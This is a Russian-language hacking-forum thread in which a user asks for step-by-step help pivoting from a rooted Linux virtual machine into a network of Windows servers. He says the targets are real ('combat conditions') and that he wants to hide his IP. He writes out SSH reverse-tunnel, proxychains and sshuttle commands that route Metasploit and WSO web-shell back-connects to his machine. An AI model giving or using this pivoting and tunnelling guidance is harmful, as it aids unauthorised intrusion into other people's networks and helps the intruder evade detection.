Привет, ачат! Прошу помощи в решении сабжа на реальном примере в режиме реального времени. Считаю, что эта тема в последствии станет не плохим мануалом, и возможно, будет перепилена в авторскую статью. Что мы имеем: 192.168.1.1\24 - локалка в ней некоторое количество роутеров и виндовсовских серверов. на серверах в виртуальной среде запущен линукс, на котором крутится веб сервер. виртуалка с порутаным линуксом, которая тоже часть сети - является моим боевым юнитом. подключен к себе бэк-коннектом через ngrok. Вопрос: как мне к примеру натравить эксплоит со своего ПК, с метасплоита например, через тот самый сервак на виртуалке, что бы добраться до винды, что находится там где-то? p.s. по ходу действия буду все сюда выкладывать и выделять самые интересные моменты. Зарание спасибо тем, кому развитие ресурса не безразлично!
Спасибо за ответы! Парни, а я могу исползуя сервис ngrok забекконектится к совоей машине, создав сессию в метасплоите, и атаковать сеть? При этом сохранится ли моя анонимность? На счёт пентестит - там мы попадаем в сеть посредством опен-впн сервера.... допустим, я подниму такой на той виртуалке - как к нему законектится, если она в нате и не имеет внешнего айпи? crlf, разжуй пожалуйста немного, как ты видишь алгоритм проксирования траффика в этой ситуации? Кстати, условия боевые, так что свой ип палить не стоит
И так, я розобрался частично с грёбаным МРЕО, но жена вынесла мне мозг, однако я нашел времени и снова достаю вас своими тупыми вопросами, а именно: в статье по ссылке выше, как я понимаю, описано примерно следующее: запускаем у себя боевой метасплоит который ждет жертву создаем промежуточный сервак, на котором траффик принимается из вне, обвертывется в прокси-чейнс на локалке, и упакованый, как шоколад у упаковку, идёт к нам на метасплоит стартуем всё это дело у меня вместо винды линукс, и вместо бэкдора бек-коннект от WSO, хотя это не должно иметь принципиальной разницы. после команды ssh -v -N -R 22222:192.168.1.50:4444 [email protected] при попытке подключения из ВСО метасплоит получает входящее соединение, но пока ещё в упаковку не обёрнутое, и брезгует есть шоколад без упаковки - по этому рвётся сессия. proxychains4 ssh -v -N -L 42022:127.0.0.1:22 [email protected] по аналогии с предыдущей командой запускается, просит пароль, подключается, но я не совсем понимаю логику с локалхоста нашей кали с порта 42022 мы пробрасывает на нашу сетевую кали на порт 22 обвернутые проксичейнсом пакеты прилетевшие с таргета, вроде так? я правилно понял? А дальше - ssh -v -N -R 22222:192.168.1.50:4444 [email protected] -p 42002 мы шоколад распаковывем с порта 42002 и швыряетм в метасплоит. но... почему? на каких основаниях? я уже близок, нид хелп. В конце обещаю запилить статейку по этому всему и по ходу дела в ней использовать ссылки на полезные материалы на нашем форуме. думаю, получится здорово и уникально
это получается при коннекте с кали на промежуточный серв root@swagcat13:~/TheFatRat# sshuttle -r swagcat13@ipaddr 0.0.0.0/0 UPD запустил. мой айпи сменился. а что теперь? как порт пробросить?